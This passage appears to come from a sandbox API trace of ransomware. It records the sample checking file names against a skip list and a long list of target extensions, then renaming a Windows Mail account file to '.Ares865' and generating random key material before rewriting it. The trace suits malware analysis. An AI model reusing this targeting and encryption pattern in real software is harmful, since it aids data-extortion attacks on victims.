(lpString="rsd") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="rsd") returned 1 [0060.596] lstrlenW (lpString="sas7bdat") returned 8 [0060.596] lstrcmpiW (lpString1="eaccount", lpString2="sas7bdat") returned -1 [0060.596] lstrlenW (lpString="sbf") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="sbf") returned 1 [0060.596] lstrlenW (lpString="scx") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="scx") returned 1 [0060.596] lstrlenW (lpString="sdb") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="sdb") returned 1 [0060.597] lstrlenW (lpString="sdc") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="sdc") returned 1 [0060.597] lstrlenW (lpString="sdf") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="sdf") returned 1 [0060.597] lstrlenW (lpString="sis") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="sis") returned 1 [0060.597] lstrlenW (lpString="spq") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="spq") returned 1 [0060.597] lstrlenW (lpString="te") returned 2 [0060.597] lstrcmpiW (lpString1="nt", lpString2="te") returned -1 [0060.597] lstrlenW (lpString="teacher") returned 7 [0060.597] lstrcmpiW (lpString1="account", lpString2="teacher") returned -1 [0060.597] lstrlenW (lpString="tmd") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="tmd") returned 1 [0060.597] lstrlenW (lpString="tps") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="tps") returned 1 [0060.597] lstrlenW (lpString="trc") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="trc") returned 1 [0060.597] lstrlenW (lpString="trc") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="trc") returned 1 [0060.597] lstrlenW (lpString="trm") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="trm") returned 1 [0060.597] lstrlenW (lpString="udb") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="udb") returned 1 [0060.597] lstrlenW (lpString="udl") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="udl") returned 1 [0060.597] lstrlenW (lpString="usr") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="usr") returned -1 [0060.597] lstrlenW (lpString="v12") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="v12") returned -1 [0060.597] lstrlenW (lpString="vis") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="vis") returned -1 [0060.597] lstrlenW (lpString="vpd") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="vpd") returned -1 [0060.597] lstrlenW (lpString="vvv") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="vvv") returned -1 [0060.597] lstrlenW (lpString="wdb") returned 3 [0060.597] lstrcmpiW (lpString1="unt", lpString2="wdb") returned -1 [0060.597] lstrlenW (lpString="wmdb") returned 4 [0060.598] lstrcmpiW (lpString1="ount", lpString2="wmdb") returned -1 [0060.598] lstrlenW (lpString="wrk") returned 3 [0060.598] lstrcmpiW (lpString1="unt", lpString2="wrk") returned -1 [0060.598] lstrlenW (lpString="xdb") returned 3 [0060.598] lstrcmpiW (lpString1="unt", lpString2="xdb") returned -1 [0060.598] lstrlenW (lpString="xld") returned 3 [0060.598] lstrcmpiW (lpString1="unt", lpString2="xld") returned -1 [0060.598] lstrlenW (lpString="xmlff") returned 5 [0060.598] lstrcmpiW (lpString1="count", lpString2="xmlff") returned -1 [0060.598] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.Ares865") returned 123 [0060.598] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.ares865"), dwFlags=0x1) returned 1 [0060.599] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.599] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1508) returned 1 [0060.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.600] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.600] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.600] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.600] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8f0, lpName=0x0) returned 0x164 [0060.603] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f0) returned 0x190000 [0060.603] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.604] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.604] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.605] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.605] CloseHandle (hObject=0x164) returned 1 [0060.605] CloseHandle (hObject=0x15c) returned 1 [0060.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.605] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6535940, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6535940, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf657b4d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", cAlternateFileName="ACCOUN~2.OEA")) returned 1 [0060.605] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="aoldtz.exe") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".") returned 1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="..") returned 1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="windows") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="bootmgr") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="temp") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="pagefile.sys") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="boot") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="ids.txt") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="ntuser.dat") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="perflogs") returned -1 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="MSBuild") returned -1 [0060.606] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0060.606] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 115 [0060.606] lstrcpyW (in: lpString1=0x2cce478, lpString2="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" | out: lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" [0060.606] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0060.606] lstrlenW (lpString="Ares865") returned 7 [0060.606] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0060.606] lstrlenW (lpString=".dll") returned 4 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".dll") returned 1 [0060.606] lstrlenW (lpString=".lnk") returned 4 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".lnk") returned 1 [0060.606] lstrlenW (lpString=".ini") returned 4 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".ini") returned 1 [0060.606] lstrlenW (lpString=".sys") returned 4 [0060.606] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".sys") returned 1 [0060.606] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0060.606] lstrlenW (lpString="bak") returned 3 [0060.606] lstrcmpiW (lpString1="unt", lpString2="bak") returned 1 [0060.606] lstrlenW (lpString="ba_") returned 3 [0060.606] lstrcmpiW (lpString1="unt", lpString2="ba_") returned 1 [0060.606] lstrlenW (lpString="dbb") returned 3 [0060.606] lstrcmpiW (lpString1="unt", lpString2="dbb") returned 1 [0060.606] lstrlenW (lpString="vmdk") returned 4 [0060.606] lstrcmpiW (lpString1="ount", lpString2="vmdk") returned -1 [0060.606] lstrlenW (lpString="rar") returned 3 [0060.606] lstrcmpiW (lpString1="unt", lpString2="rar") returned 1 [0060.607] lstrlenW (lpString="zip") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="zip") returned -1 [0060.607] lstrlenW (lpString="tgz") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="tgz") returned 1 [0060.607] lstrlenW (lpString="vbox") returned 4 [0060.607] lstrcmpiW (lpString1="ount", lpString2="vbox") returned -1 [0060.607] lstrlenW (lpString="vdi") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="vdi") returned -1 [0060.607] lstrlenW (lpString="vhd") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="vhd") returned -1 [0060.607] lstrlenW (lpString="vhdx") returned 4 [0060.607] lstrcmpiW (lpString1="ount", lpString2="vhdx") returned -1 [0060.607] lstrlenW (lpString="avhd") returned 4 [0060.607] lstrcmpiW (lpString1="ount", lpString2="avhd") returned 1 [0060.607] lstrlenW (lpString="db") returned 2 [0060.607] lstrcmpiW (lpString1="nt", lpString2="db") returned 1 [0060.607] lstrlenW (lpString="db2") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="db2") returned 1 [0060.607] lstrlenW (lpString="db3") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="db3") returned 1 [0060.607] lstrlenW (lpString="dbf") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="dbf") returned 1 [0060.607] lstrlenW (lpString="mdf") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="mdf") returned 1 [0060.607] lstrlenW (lpString="mdb") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="mdb") returned 1 [0060.607] lstrlenW (lpString="sql") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="sql") returned 1 [0060.607] lstrlenW (lpString="sqlite") returned 6 [0060.607] lstrcmpiW (lpString1="ccount", lpString2="sqlite") returned -1 [0060.607] lstrlenW (lpString="sqlite3") returned 7 [0060.607] lstrcmpiW (lpString1="account", lpString2="sqlite3") returned -1 [0060.607] lstrlenW (lpString="sqlitedb") returned 8 [0060.607] lstrcmpiW (lpString1="eaccount", lpString2="sqlitedb") returned -1 [0060.607] lstrlenW (lpString="xml") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="xml") returned -1 [0060.607] lstrlenW (lpString="$er") returned 3 [0060.607] lstrcmpiW (lpString1="unt", lpString2="$er") returned 1 [0060.608] lstrlenW (lpString="4dd") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="4dd") returned 1 [0060.608] lstrlenW (lpString="4dl") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="4dl") returned 1 [0060.608] lstrlenW (lpString="^^^") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="^^^") returned 1 [0060.608] lstrlenW (lpString="abs") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="abs") returned 1 [0060.608] lstrlenW (lpString="abx") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="abx") returned 1 [0060.608] lstrlenW (lpString="accdb") returned 5 [0060.608] lstrcmpiW (lpString1="count", lpString2="accdb") returned 1 [0060.608] lstrlenW (lpString="accdc") returned 5 [0060.608] lstrcmpiW (lpString1="count", lpString2="accdc") returned 1 [0060.608] lstrlenW (lpString="accde") returned 5 [0060.608] lstrcmpiW (lpString1="count", lpString2="accde") returned 1 [0060.608] lstrlenW (lpString="accdr") returned 5 [0060.608] lstrcmpiW (lpString1="count", lpString2="accdr") returned 1 [0060.608] lstrlenW (lpString="accdt") returned 5 [0060.608] lstrcmpiW (lpString1="count", lpString2="accdt") returned 1 [0060.608] lstrlenW (lpString="accdw") returned 5 [0060.608] lstrcmpiW (lpString1="count", lpString2="accdw") returned 1 [0060.608] lstrlenW (lpString="accft") returned 5 [0060.608] lstrcmpiW (lpString1="count", lpString2="accft") returned 1 [0060.608] lstrlenW (lpString="adb") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0060.608] lstrlenW (lpString="adb") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0060.608] lstrlenW (lpString="ade") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="ade") returned 1 [0060.608] lstrlenW (lpString="adf") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="adf") returned 1 [0060.608] lstrlenW (lpString="adn") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="adn") returned 1 [0060.608] lstrlenW (lpString="adp") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="adp") returned 1 [0060.608] lstrlenW (lpString="alf") returned 3 [0060.608] lstrcmpiW (lpString1="unt", lpString2="alf") returned 1 [0060.608] lstrlenW (lpString="ask") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="ask") returned 1 [0060.609] lstrlenW (lpString="btr") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="btr") returned 1 [0060.609] lstrlenW (lpString="cat") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="cat") returned 1 [0060.609] lstrlenW (lpString="cdb") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="cdb") returned 1 [0060.609] lstrlenW (lpString="ckp") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="ckp") returned 1 [0060.609] lstrlenW (lpString="cma") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="cma") returned 1 [0060.609] lstrlenW (lpString="cpd") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="cpd") returned 1 [0060.609] lstrlenW (lpString="dacpac") returned 6 [0060.609] lstrcmpiW (lpString1="ccount", lpString2="dacpac") returned -1 [0060.609] lstrlenW (lpString="dad") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="dad") returned 1 [0060.609] lstrlenW (lpString="dadiagrams") returned 10 [0060.609] lstrcmpiW (lpString1=".oeaccount", lpString2="dadiagrams") returned -1 [0060.609] lstrlenW (lpString="daschema") returned 8 [0060.609] lstrcmpiW (lpString1="eaccount", lpString2="daschema") returned 1 [0060.609] lstrlenW (lpString="db-journal") returned 10 [0060.609] lstrcmpiW (lpString1=".oeaccount", lpString2="db-journal") returned -1 [0060.609] lstrlenW (lpString="db-shm") returned 6 [0060.609] lstrcmpiW (lpString1="ccount", lpString2="db-shm") returned -1 [0060.609] lstrlenW (lpString="db-wal") returned 6 [0060.609] lstrcmpiW (lpString1="ccount", lpString2="db-wal") returned -1 [0060.609] lstrlenW (lpString="dbc") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="dbc") returned 1 [0060.609] lstrlenW (lpString="dbs") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="dbs") returned 1 [0060.609] lstrlenW (lpString="dbt") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="dbt") returned 1 [0060.609] lstrlenW (lpString="dbv") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="dbv") returned 1 [0060.609] lstrlenW (lpString="dbx") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="dbx") returned 1 [0060.609] lstrlenW (lpString="dcb") returned 3 [0060.609] lstrcmpiW (lpString1="unt", lpString2="dcb") returned 1 [0060.610] lstrlenW (lpString="dct") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="dct") returned 1 [0060.610] lstrlenW (lpString="dcx") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="dcx") returned 1 [0060.610] lstrlenW (lpString="ddl") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="ddl") returned 1 [0060.610] lstrlenW (lpString="dlis") returned 4 [0060.610] lstrcmpiW (lpString1="ount", lpString2="dlis") returned 1 [0060.610] lstrlenW (lpString="dp1") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="dp1") returned 1 [0060.610] lstrlenW (lpString="dqy") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="dqy") returned 1 [0060.610] lstrlenW (lpString="dsk") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="dsk") returned 1 [0060.610] lstrlenW (lpString="dsn") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="dsn") returned 1 [0060.610] lstrlenW (lpString="dtsx") returned 4 [0060.610] lstrcmpiW (lpString1="ount", lpString2="dtsx") returned 1 [0060.610] lstrlenW (lpString="dxl") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="dxl") returned 1 [0060.610] lstrlenW (lpString="eco") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="eco") returned 1 [0060.610] lstrlenW (lpString="ecx") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="ecx") returned 1 [0060.610] lstrlenW (lpString="edb") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="edb") returned 1 [0060.610] lstrlenW (lpString="epim") returned 4 [0060.610] lstrcmpiW (lpString1="ount", lpString2="epim") returned 1 [0060.610] lstrlenW (lpString="fcd") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="fcd") returned 1 [0060.610] lstrlenW (lpString="fdb") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="fdb") returned 1 [0060.610] lstrlenW (lpString="fic") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="fic") returned 1 [0060.610] lstrlenW (lpString="flexolibrary") returned 12 [0060.610] lstrcmpiW (lpString1="F}.oeaccount", lpString2="flexolibrary") returned -1 [0060.610] lstrlenW (lpString="fm5") returned 3 [0060.610] lstrcmpiW (lpString1="unt", lpString2="fm5") returned 1 [0060.611] lstrlenW (lpString="fmp") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="fmp") returned 1 [0060.611] lstrlenW (lpString="fmp12") returned 5 [0060.611] lstrcmpiW (lpString1="count", lpString2="fmp12") returned -1 [0060.611] lstrlenW (lpString="fmpsl") returned 5 [0060.611] lstrcmpiW (lpString1="count", lpString2="fmpsl") returned -1 [0060.611] lstrlenW (lpString="fol") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="fol") returned 1 [0060.611] lstrlenW (lpString="fp3") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="fp3") returned 1 [0060.611] lstrlenW (lpString="fp4") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="fp4") returned 1 [0060.611] lstrlenW (lpString="fp5") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="fp5") returned 1 [0060.611] lstrlenW (lpString="fp7") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="fp7") returned 1 [0060.611] lstrlenW (lpString="fpt") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="fpt") returned 1 [0060.611] lstrlenW (lpString="frm") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="frm") returned 1 [0060.611] lstrlenW (lpString="gdb") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="gdb") returned 1 [0060.611] lstrlenW (lpString="gdb") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="gdb") returned 1 [0060.611] lstrlenW (lpString="grdb") returned 4 [0060.611] lstrcmpiW (lpString1="ount", lpString2="grdb") returned 1 [0060.611] lstrlenW (lpString="gwi") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="gwi") returned 1 [0060.611] lstrlenW (lpString="hdb") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="hdb") returned 1 [0060.611] lstrlenW (lpString="his") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="his") returned 1 [0060.611] lstrlenW (lpString="ib") returned 2 [0060.611] lstrcmpiW (lpString1="nt", lpString2="ib") returned 1 [0060.611] lstrlenW (lpString="idb") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="idb") returned 1 [0060.611] lstrlenW (lpString="ihx") returned 3 [0060.611] lstrcmpiW (lpString1="unt", lpString2="ihx") returned 1 [0060.612] lstrlenW (lpString="itdb") returned 4 [0060.612] lstrcmpiW (lpString1="ount", lpString2="itdb") returned 1 [0060.612] lstrlenW (lpString="itw") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="itw") returned 1 [0060.612] lstrlenW (lpString="jet") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="jet") returned 1 [0060.612] lstrlenW (lpString="jtx") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="jtx") returned 1 [0060.612] lstrlenW (lpString="kdb") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="kdb") returned 1 [0060.612] lstrlenW (lpString="kexi") returned 4 [0060.612] lstrcmpiW (lpString1="ount", lpString2="kexi") returned 1 [0060.612] lstrlenW (lpString="kexic") returned 5 [0060.612] lstrcmpiW (lpString1="count", lpString2="kexic") returned -1 [0060.612] lstrlenW (lpString="kexis") returned 5 [0060.612] lstrcmpiW (lpString1="count", lpString2="kexis") returned -1 [0060.612] lstrlenW (lpString="lgc") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="lgc") returned 1 [0060.612] lstrlenW (lpString="lwx") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="lwx") returned 1 [0060.612] lstrlenW (lpString="maf") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="maf") returned 1 [0060.612] lstrlenW (lpString="maq") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="maq") returned 1 [0060.612] lstrlenW (lpString="mar") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="mar") returned 1 [0060.612] lstrlenW (lpString="marshal") returned 7 [0060.612] lstrcmpiW (lpString1="account", lpString2="marshal") returned -1 [0060.612] lstrlenW (lpString="mas") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="mas") returned 1 [0060.612] lstrlenW (lpString="mav") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="mav") returned 1 [0060.612] lstrlenW (lpString="maw") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="maw") returned 1 [0060.612] lstrlenW (lpString="mdbhtml") returned 7 [0060.612] lstrcmpiW (lpString1="account", lpString2="mdbhtml") returned -1 [0060.612] lstrlenW (lpString="mdn") returned 3 [0060.612] lstrcmpiW (lpString1="unt", lpString2="mdn") returned 1 [0060.612] lstrlenW (lpString="mdt") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="mdt") returned 1 [0060.613] lstrlenW (lpString="mfd") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="mfd") returned 1 [0060.613] lstrlenW (lpString="mpd") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="mpd") returned 1 [0060.613] lstrlenW (lpString="mrg") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="mrg") returned 1 [0060.613] lstrlenW (lpString="mud") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="mud") returned 1 [0060.613] lstrlenW (lpString="mwb") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="mwb") returned 1 [0060.613] lstrlenW (lpString="myd") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="myd") returned 1 [0060.613] lstrlenW (lpString="ndf") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="ndf") returned 1 [0060.613] lstrlenW (lpString="nnt") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="nnt") returned 1 [0060.613] lstrlenW (lpString="nrmlib") returned 6 [0060.613] lstrcmpiW (lpString1="ccount", lpString2="nrmlib") returned -1 [0060.613] lstrlenW (lpString="ns2") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="ns2") returned 1 [0060.613] lstrlenW (lpString="ns3") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="ns3") returned 1 [0060.613] lstrlenW (lpString="ns4") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="ns4") returned 1 [0060.613] lstrlenW (lpString="nsf") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="nsf") returned 1 [0060.613] lstrlenW (lpString="nv") returned 2 [0060.613] lstrcmpiW (lpString1="nt", lpString2="nv") returned -1 